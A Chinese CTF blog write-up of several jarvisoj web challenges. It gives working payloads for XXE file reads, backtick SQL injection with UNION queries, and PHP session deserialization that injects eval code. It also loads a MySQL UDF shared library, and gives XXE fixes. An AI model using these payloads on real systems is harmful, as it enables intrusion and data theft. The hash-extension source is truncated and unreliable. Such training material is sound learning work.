记录jarvisoj-web (觉得有意思的题目)

主页,writeup,ctf,web,嘤嘤嘤 2018-07-18

  • 目录
  • xxe实体上传漏洞
  • 反引号注入
  • PHP session反序列化注入
  • mysql 导入.so文件
  • hash拓展攻击

  • xxe实体上传漏洞

题目链接:

http://web.jarvisoj.com:9882/

题目源码:

function XHR() {
        var xhr;
        try {xhr = new XMLHttpRequest();}
        catch(e) {
            var IEXHRVers =["Msxml3.XMLHTTP","Msxml2.XMLHTTP","Microsoft.XMLHTTP"];
            for (var i=0,len=IEXHRVers.length;i< len;i++) {
                try {xhr = new ActiveXObject(IEXHRVers[i]);}
                catch(e) {continue;}
            }
        }
        return xhr;
    }

function send(){
 evil_input = document.getElementById("evil-input").value;
 var xhr = XHR();
     xhr.open("post","/api/v1.0/try",true);
     xhr.onreadystatechange = function () {
         if (xhr.readyState==4 && xhr.status==201) {
             data = JSON.parse(xhr.responseText);
             tip_area = document.getElementById("tip-area");
             tip_area.value = data.task.search+data.task.value;
         }
     };
     xhr.setRequestHeader("Content-Type","application/json");
     xhr.send('{"search":"'+evil_input+'","value":"own"}');
}

代码是一个AJXA异步post上传.
这里看了题解才知道是xxe实体上传漏洞.
之前没见过,所以写下博客记录一下.

首先随便输入123.
得到request

POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/json
Referer: http://web.jarvisoj.com:9882/
Content-Length: 30
Cookie: UM_distinctid=1633abd2b6a7df-048c43202bcb36-1269624a-1fa400-1633abd2b6c1100
Connection: keep-alive

{"search":"123","value":"own"}

response

HTTP/1.0 201 CREATED
Content-Type: application/json
Content-Length: 80
Server: Werkzeug/0.9.4 Python/2.7.6
Date: Wed, 18 Jul 2018 08:17:06 GMT

{
  "task": {
    "done": false, 
    "search": "123", 
    "value": "own"
  }
}

当然这跟本题无关.
既然是xxe实体上传漏洞,那么首先将request包的Content-Type: application/json修改为Content-Type: application/xml.
但是这里发现只要Content-Type不是application/json就能完成读取,建议修改后端代码.
那么这里就要构造一个xml文件.

首先xml声明:

<?xml version="1.0" ?>

这里题目提示要获得目标机器/home/ctf/flag.txt中的flag值.
那么这里就可以通过引入外部实体的方式远程读取flag.txt中的值.

<!DOCTYPE a [
    <!ENTITY b SYSTEM "/home/ctf/flag.txt">
]>

完整xml内容:

<?xml version="1.0"?>
<!DOCTYPE a [
    <!ENTITY b SYSTEM "/home/ctf/flag.txt">
]>
<c>&b;</c>

response包

<c>CTF{XxE_15_n0T_S7range_Enough}
</c>

修复方法:

php:

libxml_disable_entity_loader(true);

java:

DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

python:

from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

the others:
XML External Entity (XXE) Prevention Cheat Sheet

以及过滤关键词,如:system,<!ENTITY and so on.


参考文章:
未知攻焉知防——XXE漏洞攻防
XXE注入攻击与防御
【XXE】XXE漏洞攻击与防御


  • 反引号注入

题目链接:

http://web.jarvisoj.com:32794/

题目源码:

<?php
require("config.php");
$table = $_GET['table']?$_GET['table']:"test";
$table = Filter($table);
mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";
$ret = sql_query($sql);
echo $ret[0];
?>

题目提示源码
工具冲鸭
在index.php~下拿到源码
分析主要代码在

mysqli_query($mysqli,"desc `secret_{$table}`") or Hacker();
$sql = "select 'flag{xxx}' from secret_{$table}";

存在注入
这里可以看到使用了反引号,百度了一下.

MySQL中单引号、双引号和反引号的区别

通过本地测试,可以得到

1.desc `aaa` `bbb`
2.desc aaa bbb
3.desc 'aaa' 'bbb'

1、2是同样的效果
3无法执行

上面的语句就等同于

1.select * from user bbb where bbb.id = 1
2.select * from `user`  `bbb` where bbb.id = 1

那么我们就可以构造

desc `test` `union select 1`

使前面的语句被后面的语句替换,达到查询的目的,但是显示结果只有一条,所以我们利用limit进行跳跃.


查库名 61d300

http://web.jarvisoj.com:32794?table=test` `union select database() limit 1,2

表名 secret_flag,secret_test

http://web.jarvisoj.com:32794?table=test` `union select group_concat(table_name) from information_schema.tables where table_schema=0x363164333030 limit 1,2

字段名 flagUwillNeverKnow

http://web.jarvisoj.com:32794?table=test` `union select group_concat(column_name) from information_schema.columns where table_name=0x7365637265745f666c6167 limit 1,2

查flag flag{luckyGame~}

http://web.jarvisoj.com:32794?table=test` `union select flagUwillNeverKnow from secret_flag limit 1,2

  • PHP session反序列化注入

题目链接:

http://web.jarvisoj.com:32784/

题目源码:

<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO
{
    public $mdzz;
    function __construct()
    {
        $this->mdzz = 'phpinfo();';
    }
    
    function __destruct()
    {
        eval($this->mdzz);
    }
}
if(isset($_GET['phpinfo']))
{
    $m = new OowoO();
}
else
{
    highlight_string(file_get_contents('index.php'));
}
?>

题目提示phpinfo,尝试输入phpinfo.php.

http://web.jarvisoj.com:32784/phpinfo.php

发现文件目录/opt/lampp/htdocs.
PHP session反序列化可以看这里:有趣的php反序列化总结

先本地创建一个test.html.

<form action="http://web.jarvisoj.com:32784/" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" />
</form>

截取上传包如下

-----------------------------306841150525235
Content-Disposition: form-data; name="PHP_SESSION_UPLOAD_PROGRESS"

123
-----------------------------306841150525235
Content-Disposition: form-data; name="file"; filename=""
Content-Type: application/octet-stream


-----------------------------306841150525235--

filename处就可以传入参数了.
首先遍历文件目录

filename="|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:39:\"print_r(scandir(\"/opt/lampp/htdocs/\"));\";}"

得到

Array
(
    [0] => .
    [1] => ..
    [2] => Here_1s_7he_fl4g_buT_You_Cannot_see.php
    [3] => index.php
    [4] => phpinfo.php
)

这里看到Here_1s_7he_fl4g_buT_You_Cannot_see.php,猜测flag就在其中,查看文件即可.

filename="|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:73:\"show_source(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\");\";}"

即flag.
"CTF{4d96e37f4be998c50aa586de4ada354a}"


  • mysql 导入.so文件

题目链接:

https://dn.jarvisoj.com/challengefiles/udf.so.02f8981200697e5eeb661e64797fc172


刚拿到题一脸懵逼,看了writeup才知道原来有这种操作?????
首先在mysqlplugin目录下将文件wget下来.

usr/lib/mysql/plugin# wget https://dn.jarvisoj.com/challengefiles/udf.so.02f8981200697e5eeb661e64797fc172

题目提示help_me函数,于是创建一个help_me函数.

mysql> create function help_me returns string soname 'udf.so.02f8981200697e5eeb661e64797fc172';

得到如下内容.

mysql> select help_me();
+---------------------------------------------+
| help_me()                                   |
+---------------------------------------------+
| use getflag function to obtain your flag!!
 |
+---------------------------------------------+
1 row in set (0.00 sec)

提示getflag,步骤如上.

mysql> create function getflag returns string soname 'udf.so.02f8981200697e5eeb661e64797fc172';
Query OK, 0 rows affected (0.01 sec)

mysql> select getflag();
+------------------------------------------+
| getflag()                                |
+------------------------------------------+
| PCTF{Interesting_U5er_d3fined_Function}
 |
+------------------------------------------+
1 row in set (0.00 sec)

  • hash拓展攻击

题目链接:

http://web.jarvisoj.com:32778/

题目源码:

<!DOCTYPE html>
<html>
<head>
<title>Web 350</title>
<style type="text/css">
        body {
                background:gray;
                text-align:center;
        }
</style>
</head>

<body>
        <?php
                $auth = false;
                $role = "guest";
                $salt =
                if (isset($_COOKIE["role"])) {
                        $role = unserialize($_COOKIE["role"]);
                        $hsh = $_COOKIE["hsh"];
                        if ($role==="admin" && $hsh === md5($salt.strrev($_COOKIE["role"]))) {
                                $auth = true;
                        } else {
                                $auth = false;
                        }
                } else {
                        $s = serialize($role);
                        setcookie('role',$s);
                        $hsh = md5($salt.strrev($s));
                        setcookie('hsh',$hsh);
                }
                if ($auth) {
                        echo "<h3>Welcome Admin. Your flag is
                } else {
                        echo "<h3>Only Admin can see the flag!!</h3>";
                }
        ?>

</body>
</html>


本文由 saltyfishyu 创作,采用 知识共享署名 3.0,可自由转载、引用,但需署名作者且注明文章出处。

还不快抢沙发

添加新评论